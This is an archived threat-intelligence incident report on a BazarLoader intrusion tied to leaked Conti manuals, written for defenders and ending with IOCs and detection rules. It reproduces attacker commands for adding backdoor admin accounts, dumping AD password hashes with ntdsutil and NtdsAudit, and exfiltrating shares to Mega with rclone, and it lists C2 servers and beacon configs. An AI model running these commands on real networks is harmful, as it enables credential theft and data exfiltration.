{ "id": "aebff5d1-6a71-4e93-8120-ec1832fdcc95", "created_at": "2026-04-06T00:15:22.723518Z", "updated_at": "2026-04-10T03:37:23.857551Z", "deleted_at": null, "sha1_hash": "297f62e26c67ffacef5e08e21f9e227d2a2b19bd", "title": "BazarLoader and the Conti Leaks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2207936, "plain_text": "BazarLoader and the Conti Leaks\r\nBy editor\r\nPublished: 2021-10-04 · Archived: 2026-04-05 21:13:15 UTC\r\nIntro\r\nIn July, we observed an intrusion that started from a BazarLoader infection and lasted approximately three days. The threat\r\nactor’s main priority was to map the domain network, while looking for interesting data to exfiltrate. Their preferred method\r\nof operation was through GUI applications such as RDP and AnyDesk.\r\nHistorically, BazarLoader was used to deploy Ryuk, as we reported on many occasions. In one of our latest reports, we saw\r\nBazarLoader result in the deployment of Conti ransomware.\r\nCase Summary\r\nIn this case, we did not see the exact initial access vector but based on other reports at the time we assess with medium to\r\nhigh confidence a malicious email campaign delivering macro enabled Word documents was the delivery vector. Shortly\r\nafter the initial BazarLoader execution, we observed the first discovery commands using the standard built in Microsoft\r\nutilities (net view, net group, nltest). We saw the BazarLoader process download and execute the first Cobalt Strike beacon\r\ntwenty minutes later using rundll32.\r\nAs the operators tried to enumerate the network, they miss-typed a lot of their commands. During interactive discovery tasks\r\nvia the Cobalt Strike beacon, the threat actors attempted an unusual command that had us scratching our heads for awhile,\r\n“av_query”. This left us confused, we were not aware of the reason and/or the purpose of this command.\r\nOn August 5th, a threat actor that goes with the name “m1Geelka”, leaked multiple documents that contained instructions,\r\ntools and, “training” materials to be used by affiliates of Conti ransomware. We demonstrated some of the documents on one\r\nof our recent tweet threads, more info about the Conti leak here. In these materials, we found a file called “AVquery.cna”\r\nthat refers to a Cobalt Strike aggressor script for identifying AV on the target systems. It is likely that the threat actors in this\r\nintrusion meant to use this aggressor script via their Cobalt Strike console, but instead typed or pasted “av_query” into their\r\nwindows command prompt session. Additionally, threat actors were seen following the instructions of the leaked documents\r\nstep by step. More specifically, we observed the threat actors copy/pasting the exact commands such as creating local admin\r\nusers that contained the same passwords we saw in the leaked instructions.\r\nContinuing with the discovery phase, the threat actors executed AdFind via a batch script before further enumerating using\r\nnative Windows tools and port scanning via the Cobalt Strike beacon. They then successfully escalated privileges by\r\ndumping credentials from the LSASS process. After having enough situational awareness over the domain and an\r\nadministrator’s account in their possession, operators used a reverse proxy and established a RDP connection on the\r\nbeachhead host. Moments later, we observed them move laterally for the first time to the Domain Controller using RDP.\r\nOnce on the Domain Controller, they again downloaded and executed AdFind through the same batch script. They also ran\r\ntwo separate Cobalt Strike beacons. As if their presence was not enough with Cobalt Strike and administrator credentials,\r\nthey proceeded with creating two local administrator accounts.\r\nNext, they installed AnyDesk, a remote access application for RDP connectivity and remote system control. After having\r\nfour different types of persistence, they felt it was enough and continued enumerating the network, only this time, they\r\nsearched for valuable documents across all domain-joined hosts. To accomplish that, they used PowerSploit and, more\r\nspecifically, the “Invoke-ShareFinder” module. While waiting for their script to finish, the threat actors created a full backup\r\nof active directory in “IFM” media mode and dumped the password hashes along with the corresponding users. This method\r\nis both stealthier and safer for extracting the hashes from active directory, as explained by Black Hills Information Security.\r\nThe next step for the threat actors was to download and run “Advanced IP Scanner” and scanned for ranges looking for other\r\nactive subnets on the LAN. After four hours of downtime, the operators returned to the network and did something\r\nunexpected; they used seatbelt to enumerate the domain controller further. They then pivoted over to another domain\r\ncontroller, repeated all the above discovery steps, and ran the same tools as on the first domain controller.\r\nEventually, this intrusion ended on the third day from the initial BazarLoader execution. After almost a day of inactivity, the\r\noperators logged into the network and used RDP to remote into file servers that contained valuable data. They then created a\r\ndirectory called Shares$ and used Rclone to exfiltrate the data to the Mega Fileshare service. Typically, these types of cases\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 1 of 21\n\nend up with Conti ransomware, however, the threat actors were evicted from the network before a final suspected\r\nransomware deployment commenced.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found here.\r\nThree of the Cobalt Strike servers from this case were added to the Threat Feed on 7/19 and the other two were added on\r\n7/29.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 2 of 21\n\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 3 of 21\n\nMITRE ATT\u0026CK\r\nInitial Access\r\nWe assess with medium to high confidence that the initial access was a result of malicious, macro-enabled, Word document\r\nthat was sent as an attachment to the targets of a phishing campaign.\r\nBrad reported on similar BazarLoader activity initiated from malicious TA551 Word Doc email campaign that resulted in\r\nCobalt Strike beacons.\r\nExecution\r\nThe initial execution for this intrusion took place with the use of BazarLoader malware via rundll32.\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 4 of 21\n\nImmediately after the execution, the malware contacted two of its C2 IPs:\r\n35.165.197.209|443\r\n3.101.57.185|443\r\nWe then observed the threat actor using the BazarLoader injected process, svchost.exe, to download Cobalt Strike and save\r\nit under:\r\nC:\\Users\\\u003cuser\u003e\\Appdata\\Local\\Temp\r\nbefore executing it using rundll32.exe.\r\nThroughout the intrusion, the threat actors utilized Cobalt Strike beacons and PowerShell to execute their payloads prior to\r\ninteractively remoting into hosts using RDP and AnyDesk.\r\nPersistence\r\nThe threat actors created two local user accounts on the first Domain Controller. They also added one of the two to the local\r\nadministrators group. The passwords that they used were the same as the passwords of the recent Conti leaked documents.\r\nScreenshot from leaked Conti data (“Закреп\\ AnyDesk.txt”) (our tweet thread on Conti leak manuals):\r\nCommands from the intrusion:\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 5 of 21\n\nnet user sqlbackup qc69t4b#z0ke3 /add\r\nnet user localadmin qc69t4b#z0ke3 /add\r\nnet localgroup administrators localadmin /add\r\nAnyDesk was also installed on the main domain controller.\r\nThe threat actors maintained an open communication channel through AnyDesk for a period of 11 hours.\r\nThe threat actor was seen logging in from 185.220.100.242 (Tor Exit Node) using AnyDesk. Client ID 776934005.\r\n(ad_svc.trace)\r\nPrivilege Escalation\r\nThe threat actors accessed credentials for an administrator account from the LSASS process using the Cobalt Strike beacon.\r\nOn the image below, we can see that the CS beacon process is injected into LSASS.\r\nDefense Evasion\r\nThroughout the intrusion, we observed multiple instances of process injection  from both the initial BazarLoader malware\r\nand Cobalt Strike beacons.\r\nAfter BazarLoader was loaded in memory, almost immediately it injected into svchost.exe process. Additionally, the Cobalt\r\nStrike beacon was injected into mstsc.exe, searchindexer.exe and rundll32.exe and run various tasks from these processes.\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 6 of 21\n\nCredential Access\r\nThe LSASS process was accessed by an unusual process “searchindexer.exe” on beachhead right before the lateral\r\nmovement was observed. Searchindexer.exe is a legitimate Windows process responsible for the indexing of files or\r\nWindows searches.\r\nThis technique is known to be used by Cobaltstrike which inject malicious code into a newly spawned searchindexer process\r\nto evade detection. This is associated with MITRE ATT\u0026CK (r) Tactic(s): Defense Evasion and Technique(s): T1036.004.\r\nThe Sysmon logs captured in our case below can be used to detect this type of activity.\r\nSysmon Event ID: 10\r\nDescription: Process Access\r\nSourceImage: C:\\Winows\\System32\\SearchIndexer.exe\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nSourceImage: C:\\Winows\\System32\\SearchIndexer.exe\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x21410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d2e4|C:\\Windows\\System32\\KERNELBASE.dll+2bcee|C:\\Program Files\\Common Files\\Micr\r\nThe threat actors created a full backup of the active directory in “IFM” media mode and dumped the password hashes along\r\nwith the corresponding users.\r\nntdsutil \"ac in ntds\" \"ifm\" \"create full c:\\windows\\temp\\crashpad\\x\" q q\r\nThey also employed the NtdsAudit tool immediately after using NTDSutil to dump the password hashes of all domain users.\r\nNtdsAudit requires the “ntds.dit” database file and SYSTEM registry file for extracting the password hashes and usernames.\r\nAfter providing these as arguments, they exported the password hashes in a file that they named “pwdump.txt” and the user\r\ndetails in a csv file called “users.csv”. After obtaining the password hashes, the threat actors can crack the passwords hashes\r\nusing a program such as hashcat.\r\nntdsAudit.exe ntds.dit -s SYSTEM -p pwddump.txt -u users.csv\r\nDiscovery\r\nA few minutes after the initial execution, BazarLoader ran some discovery tasks using the built in Microsoft net and nltest\r\nutilities and transferred the results over the C2 channel.\r\nnet view /all\r\nnet view /all /domain\r\nnltest /domain_trusts /all_trusts\r\nnet localgroup \"administrator\" (comment: command mistyped)\r\nnet group \"domain admins\" /dom\r\nLater on, hands-on operators carried out some additional network and domain reconnaissance from the Cobalt Strike beacon.\r\nAgain, built in utilities were favored, with the exception of what we assess was a fat finger or miss-paste by the threat actor\r\nentering a command they meant to execute in their Cobalt Strike console into the windows command terminal.\r\nipconfig /all\r\nnltest /dclist\r\nnet group \"Domain Admins\" /dom\r\ntasklist\r\nav_query (comment: Not a valid command)\r\nnet localgroup Administrateurs (comment: French translation of the named group administrators)\r\nnet localgroup Administrators\r\nSYSTEMINFO\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 7 of 21\n\nThe threat actors executed AdFind multiple times on both the beachhead and the domain controllers through a well-known\r\nscript called adf.bat.\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -f \"(objectcategory=organizationalunit)\"\r\nadfind.exe -sc trustdmp\r\nadfind.exe -subnets -f (objectcategory=subnet)\r\nadfind.exe -f \"(objectcategory=group)\"\r\nadfind.exe -gcb -sc trustdmp\r\nLater on, during the first day of the intrusion, and before we saw the threat actors pivot laterally to the domain controller,\r\nthey ensured the information that they had collected was accurate by running the below enumeration commands:\r\nnet use\r\nipconfig /all\r\nnetstat -ano\r\nnet group \"domain admins\" /domain\r\nnet view \"Domain Controller name\"\r\nnet view \"Second Domain Controller name\"\r\nping \"Domain Controller IP\"\r\nping \"Domain Controller name\"\r\nping \"Second Domain Controller name\"\r\nping \"Domain Controller IPv6\"\r\necho %%username%%\r\narp -a\r\ntime\r\ndate\r\nThreat actor dropped and ran a script named ping.bat. Here’s an example:\r\nping -n 1 hostname \u003e\u003e C:\\programdata\\log.txt\r\nping -n 1 hostname2 \u003e\u003e C:\\programdata\\log.txt\r\nping -n 1 hostname3 \u003e\u003e C:\\programdata\\log.txt\r\nThe threat actors utilized Advanced IP Scanner to the scan for open ports.\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 8 of 21\n\nOne of the first things that the attackers did once on the first domain controller, was to execute Invoke-ShareFinder from\r\nPowerSploit via PowerShell ISE. They did the same thing later, on the second domain controller.\r\n\"Command\": \"Get-NetCurrentUser\"\r\n\"Command\": \"Get-NetDomain\"\r\n\"Command\": \"Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\\ProgramData\\shares.txt\"\r\nOther Microsoft AD management PowerShell administration modules were also invoked by the threat actors for discovery\r\ntasks.\r\nGet-ADDomainController\r\nGet-ADDomainController -Filter * | ft\r\nGet-ADComputer -Filter * -Properties * | Get-Member\r\nGet-ADDomain\r\nFrom the Domain Controller the threat actor also ran a Seatbelt binary, which was also seen in the Conti leak documents.\r\nThis utility contains a number of “safety checks” on a host, telling the user about things like installed AV, network drives,\r\nlocal users, and much more.\r\nWe also noticed the threat actors searching for any existing antivirus software on the domain controller. They ran “dir” on\r\nthe “c:\\Program Files\\” folder and saved the findings in the AV.txt file using a script named av.bat The script looked similar\r\nto the below:\r\ndir \"\\\\hostname\\c$\\Program Files\\* \u003e\u003e C:\\programdata\\AV.txt\r\ndir \"\\\\hostname2\\c$\\Program Files\\* \u003e\u003e C:\\programdata\\AV.txt\r\ndir \"\\\\hostname3\\c$\\Program Files\\* \u003e\u003e C:\\programdata\\AV.txt\r\nLateral Movement\r\nMany hours after the initial compromise, we observed the threat actors using RDP to connect to the first domain controller.\r\nThey used reverse proxy via the Cobalt Strike C2 to initiate the RDP connection and for that reason, the operator’s real\r\nhostname was captured in event ID 4624:\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 9 of 21\n\nCollection\r\nPrior to exfiltrating the data, operators staged them under a directory called “Shares” on each file server. They then inspected\r\nthe documents they collected prior to exfiltrating them over to Mega storage servers using the Rclone application.\r\nCommand and Control\r\nBazarLoader initial communication with the C2 is over HTTPS. Data is sent to the C2 via the cookie parameter(screenshot\r\ntaken from https://tria.ge/210716-v4jh8hf6ea/behavioral2).\r\nTwenty minutes after the initial execution, BazarLoader downloaded and executed Cobalt Strike beacon with the help of\r\nrundll32.exe.\r\nThe AnyDesk software installed by the threat actors maintained a constant connection to the Anydesk infrastructure for the\r\nduration of the intrusion.\r\nAnyDesk:\r\n143.244.61.217:443\r\nJA3: c91bde19008eefabce276152ccd51457\r\nJA3s: 107030a763c7224285717ff1569a17f3\r\nCertificate: [18:42:fd:a1:39:29:33:47:44:65:bc:a2:d6:73:a8:c5:c9:35:9a:f3 ]\r\nNot Before: 2014/04/11 02:37:55 UTC\r\nNot After: 2024/04/08 02:37:55 UTC\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 10 of 21\n\nIssuer Org: philandro Software GmbH\r\nSubject Common: anynet root ca\r\nSubject Org: philandro Software GmbH\r\nPublic Algorithm: rsaEncryption\r\nCertificate: [9e:08:d2:58:a9:02:cd:4f:e2:4a:26:b8:48:5c:43:0b:81:29:99:e3 ]\r\nNot Before: 2018/11/18 02:14:23 UTC\r\nNot After: 2028/11/15 02:14:23 UTC\r\nIssuer Org: philandro Software GmbH\r\nSubject Common: anynet relay\r\nSubject Org: philandro Software GmbH\r\nPublic Algorithm: id-ecPublicKey Curveprime256v1\r\nSome network oddities appeared several times during the course of the intrusion. One of those oddities was several\r\nconnections across the intrusion to an XMPP chat server at chatterboxtown.us at 70.35.205.161. These connections\r\noriginated from one of the Cobalt Strike processes over port 5222. The goal of this traffic was not discovered in the course\r\nof the investigation.\r\nAnother, was a brief SSH connection to a server on the internet using Putty.\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 11 of 21\n\nThe connection took place for a period of twenty minutes. The reason for this connection is unknown. According to public\r\nrecords, the IP is associated with an old Cobalt Strike C2 server.\r\nBazarLoader:\r\n35.165.197.209:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [df:f6:ef:75:f8:f5:c8:8c:1a:4b:49:fd:29:99:d8:58:d0:9c:17:b0 ]\r\nNot Before: 2021/07/13 11:58:09 UTC\r\nNot After: 2022/07/13 11:58:09 UTC\r\nIssuer Org: NN Fern\r\nSubject Common: forenzik.kz\r\nSubject Org: NN Fern\r\nPublic Algorithm: rsaEncryption\r\n3.101.57.185:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [71:9c:ce:11:b3:f0:ea:6f:1e:0f:ff:0f:b4:34:ec:bb:6c:aa:35:40 ]\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 12 of 21\n\nNot Before: 2021/07/13 11:58:21 UTC\r\nNot After: 2022/07/13 11:58:21 UTC\r\nIssuer Org: NN Fern Subject\r\nCommon: forenzik.kz\r\nSubject Org: NN Fern\r\nPublic Algorithm: rsaEncryption\r\n54.177.153.230:443\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: e35df3e00ca4ef31d42b34bebaa2f86e\r\nCertificate: [a1:ab:fe:d6:e4:5a:23:14:dd:8b:67:54:1d:8e:85:b1:c6:10:4a:3f ]\r\nNot Before: 2021/07/13 11:58:22 UTC\r\nNot After: 2022/07/13 11:58:22 UTC\r\nIssuer Org: NN Fern\r\nSubject Common: forenzik.kz\r\nSubject Org: NN Fern\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike:\r\nyawero.com (45.153.240.234:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]\r\nNot Before: 2021/06/02 00:00:00 UTC\r\nNot After: 2022/06/02 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: sazoya.com [sazoya.com ,www.sazoya.com ]\r\nPublic Algorithm: rsaEncryption\r\nsazoya.com (23.106.160.77:443) This Cobalt Strike server was added to our Threat Feed on 07/29/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]\r\nNot Before: 2021/06/02 00:00:00 UTC\r\nNot After: 2022/06/02 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: sazoya.com [sazoya.com ,www.sazoya.com ]\r\nPublic Algorithm: rsaEncryption\r\nsazoya.com (192.198.86.130:443) This Cobalt Strike server was added to our Threat Feed on 07/29/2021. The IP appeared\r\npreviously tied to a different domain on 05/11/2021.\r\nJA3: 72a589da586844d7f0818ce684948eea\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [f7:1b:37:3f:2c:0e:c4:3f:dd:3a:f5:dd:ad:39:54:b2:db:b4:c7:f3 ]\r\nNot Before: 2021/06/02 00:00:00 UTC\r\nNot After: 2022/06/02 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: sazoya.com [sazoya.com ,www.sazoya.com ]\r\nPublic Algorithm: rsaEncryption\r\n{\r\n \"x64\": {\r\n \"md5\": \"9ea3a4b4bf64aeaefb60ada634f7fb43\",\r\n \"sha1\": \"3e12312e43f4b84129023057862ee3934ca24c6d\",\r\n \"time\": 1627455897000.6,\r\n \"sha256\": \"43ecc44566a599a1f5d5b5063f27fd18b34e0dc67e053570e9ad944ad3f16024\",\r\n \"config\": {\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"HTTP Method Path 2\": \"/ro\",\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 13 of 21\n\n\"Jitter\": 14,\r\n \"C2 Server\": \"yawero.com,/skin.js,sazoya.com,/skin.js,192.198.86.130,/skin.js\",\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Method 2\": \"POST\",\r\n \"Polling\": 5000,\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\"\r\n },\r\n \"uri_queried\": \"/IMXo\"\r\n },\r\n \"x86\": {\r\n \"md5\": \"d2bb4366b7018e0ed3e7f752fc312371\",\r\n \"sha1\": \"0dfc5ef1947a29227d994a44f33c1b0fe12598ea\",\r\n \"time\": 1627455891592.5,\r\n \"sha256\": \"01b164f74bde4eb7c7da8c6cd707f23ce1923da49a3deb36aea5cd6e3030c0d6\",\r\n \"config\": {\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\",\r\n \"HTTP Method Path 2\": \"/groupcp\",\r\n \"Jitter\": 14,\r\n \"C2 Server\": \"yawero.com,/skin.js,sazoya.com,/skin.js,192.198.86.130,/skin.js”,v\r\n \"Method 1\": \"GET\",\r\n \"Port\": 443,\r\n \"Method 2\": \"POST\",\r\n \"Polling\": 5000,\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"Watermark\": 1580103814,\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\"\r\n },\r\n \"uri_queried\": \"/PJkW\"\r\n }\r\n}\r\nCobalt Strike:\r\ngojihu.com (23.106.215.61:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [1f:1c:7a:7d:0c:9d:cd:dd:47:2f:a9:e5:ac:c8:ae:da:70:29:02:81 ]\r\nNot Before: 2021/07/04 00:00:00 UTC\r\nNot After: 2022/07/04 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: yuxicu.com [yuxicu.com ,www.yuxicu.com ]\r\nPublic Algorithm: rsaEncryption\r\nyuxicu.com (23.82.19.173:443) This Cobalt Strike server was added to our Threat Feed on 07/19/2021.\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nJA3s: ae4edc6faf64d08308082ad26be60767\r\nCertificate: [1f:1c:7a:7d:0c:9d:cd:dd:47:2f:a9:e5:ac:c8:ae:da:70:29:02:81 ]\r\nNot Before: 2021/07/04 00:00:00 UTC\r\nNot After: 2022/07/04 23:59:59 UTC\r\nIssuer Org: Sectigo Limited\r\nSubject Common: yuxicu.com [yuxicu.com ,www.yuxicu.com ]\r\nPublic Algorithm: rsaEncryption\r\n{\r\n \"x86\": {\r\n \"uri_queried\": \"/HjIa\",\r\n \"md5\": \"742844254840eff409535494ae3ec338\",\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 14 of 21\n\n\"config\": {\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\",\r\n \"C2 Server\": \"gojihu.com,/fam_cart.js,yuxicu.com,/fam_cart.js\",\r\n \"HTTP Method Path 2\": \"/case\",\r\n \"Port\": 443,\r\n \"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\mstsc.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n \"Polling\": 5000,\r\n \"Jitter\": 32,\r\n \"Watermark\": 1580103814\r\n },\r\n \"sha256\": \"8c7e32178cf437f4fd3d7f706066831fce2cd9bc7e2050a3cefebab05952266d\",\r\n \"time\": 1627787111212.2,\r\n \"sha1\": \"46f33bb1c629cedb52fc5d7e46525ac5ccb13aaa\"\r\n },\r\n \"x64\": {\r\n \"uri_queried\": \"/4Ovd\",\r\n \"md5\": \"1e788b5d1ff62688cfe5d2ef7832712a\",\r\n \"config\": {\r\n \"Beacon Type\": \"8 (HTTPS)\",\r\n \"C2 Host Header\": \"\",\r\n \"C2 Server\": \"gojihu.com,/fam_cart.js,yuxicu.com,/fam_cart.js\",\r\n \"HTTP Method Path 2\": \"/case\",\r\n \"Port\": 443,\r\n \"Method 1\": \"GET\",\r\n \"Spawn To x64\": \"%windir%\\\\sysnative\\\\mstsc.exe\",\r\n \"Method 2\": \"POST\",\r\n \"Spawn To x86\": \"%windir%\\\\syswow64\\\\mstsc.exe\",\r\n \"Polling\": 5000,\r\n \"Jitter\": 32,\r\n \"Watermark\": 1580103814\r\n },\r\n \"sha256\": \"43ac1418825ccbe33ae34c64fd036f23ef066073e4fefa2a410b53922cfc815f\",\r\n \"time\": 1627787113671.1,\r\n \"sha1\": \"d4d88b60150088041fec4951335128031441bc5a\"\r\n }\r\n}\r\nExfiltration\r\nAs the threat actors were perusing files, we received a notification that one of our files had been remotely opened from\r\n46.38.235.14.\r\nThe threat actors later exfiltrated sensitive documents from domain joined file servers using the Rclone application. The\r\ndestination of the exfiltrated data was Mega.io.\r\nThe above command was copied and pasted by the threat actors to exfiltrate the data. Prior to the correct command, the\r\nthreat actors accidentally pasted a command from a previous intrusion. That command contained a different victim\r\norganization in the arguments showing through out the intrusion continued sloppiness of the threat actor.\r\nrclone.exe copy--max-age 3y \"\\\\\u003credacted\u003e\\C$\\Shares\" remote: \u003credacted\u003e\\\u003credacted\u003e --bwlimit 2M -q --ignore-existing --au\r\nBreaking down the Rclone command line arguments:\r\n- copy: Copy the source to the destination\r\n- --max-age: Only transfer files younger than \u003ctime\u003e\r\n- \\\\\u003credacted\u003e\\C$\\Shares\": From source\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 15 of 21\n\n- remote: \u003credacted\u003e\\\u003credacted\u003e: To destination folder\r\n- Bwlimit 2M: Bandwidth limit\r\n- -q: quiet\r\n- --ignore-existing: Skip all files that exist on destination\r\n- --auto-confirm: Do not request console confirmation\r\n- --multi-thread-streams: Max number of streams to use for multi-thread downloads\r\n- --transfers: Number of file transfers to run in parallel\r\n- -P: Show progress\r\nReference:\r\nhttps://rclone.org/flags/\r\nhttps://rclone.org/commands/rclone_copy/\r\nA great reference for detecting Rclone data exfiltration is the article from nccgroup: Detecting Rclone – An Effective Tool\r\nfor Exfiltration – and from Red Canary – Transferring Leverage in a Ransomware Attack.\r\nImpact\r\nMultiple sensitive files were exfiltrated but before the threat actors could take any further action inside the network, they\r\nwere evicted from the network. BazarLoader infections currently tend to materialize into Conti ransomware, and many of\r\nthe TTP’s of the infection mimic the instructions from the leaked Conti manual.\r\nInformation posted from @AltShiftPrtScn based on an IR engagement where the threat actors already had domain admin on\r\nthe network two months prior meeting their final objectives.\r\nIOCs\r\nNetwork\r\n45.153.240.234|443\r\nyawero.com\r\n23.106.160.77|443\r\nsazoya.com\r\n192.198.86.130|443\r\n23.106.215.61|443\r\ngojihu.com\r\n23.82.19.173:443\r\nyuxicu.com\r\n35.165.197.209|443\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 16 of 21\n\n3.101.57.185|443\r\n54.177.153.230|443\r\nFile\r\n21.dll\r\nd6b773f8b88be82d4de015edbf0cc2fa\r\n7461eb3051102c76004cd58e55560044d3789d5c\r\n96a74d4c951d3de30dbdaadceee0956682a37fcbbc7005d2e3bbd270fbd17c98\r\n21.exe\r\n362812fdbc2dc2c5a2b214f223f12096\r\n2c4c4926b3b931d4628425b309a3357c63634fc9\r\n972e38f7fa4c3c59634155debb6fb32eebda3c0e8e73f4cb264463708d378c39\r\n37B.dll\r\nd6b773f8b88be82d4de015edbf0cc2fa\r\n7461eb3051102c76004cd58e55560044d3789d5c\r\n96a74d4c951d3de30dbdaadceee0956682a37fcbbc7005d2e3bbd270fbd17c98\r\nadf.bat\r\n7645b80c8627b0ba13ebc20491c82792\r\n05c43272a1d244413d0ef8595518b9c7601d3968\r\n218e8dc823e27a3baf3dcf48831562d488c2fa2c205286ea9af8a718b246b4cb\r\nNtdsAudit.exe\r\n1fd930064b81e7c96eedb985ca2a0d97\r\n39f7e3f5435cdfacaa89aa5ef2d4e092bde4494e\r\nfb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b\r\nea3612919bf05b66e9a608bee742a422.dll\r\nea3612919bf05b66e9a608bee742a422\r\nfd001fb71e9faa68c6e53162ed0554fd6f16a0e381aa280cea397b3d74bb62eb\r\nDetections\r\nNetwork\r\nET TROJAN Observed Malicious SSL Cert (BazaLoader CnC)\r\nET MALWARE Observed Malicious SSL Cert (Bazar Backdoor)\r\nET POLICY IP Check Domain (myexternalip .com in TLS SNI)\r\nET POLICY SSL/TLS Certificate Observed (AnyDesk Remote Desktop Software)\r\nET USER_AGENTS AnyDesk Remote Desktop Software User-Agent\r\nET POLICY HTTP POST to MEGA Userstorage\r\nSigma\r\nDetects execution of Net.exe, whether suspicious or benign –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_net_execution.yml\r\nSuspicious AdFind Execution –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_adfind.yml\r\nAD Privileged Users or Groups Reconnaissance –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_account_discovery.yml\r\nDridex Process Pattern –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_malware_dridex.yml\r\nDomain Trust Discovery –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_trust_discovery.yml\r\nInvocation of Active Directory Diagnostic Tool (ntdsutil.exe) – https://github.com/NVISOsecurity/sigma-public/blob/master/rules/windows/process_creation/win_susp_ntdsutil.yml\r\nAdvanced IP Scanner –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_advanced_ip_scanner.yml\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 17 of 21\n\nLocal Accounts Discovery –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_local_system_owner_account_discovery.yml\r\nNet.exe User Account Creation –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_net_user_add.yml\r\nRundll32 Internet Connection –\r\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_ne\r\nMalicious PowerShell Commandlets –\r\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_malicious_commandlets.yml\r\nSuspicious Svchost Process 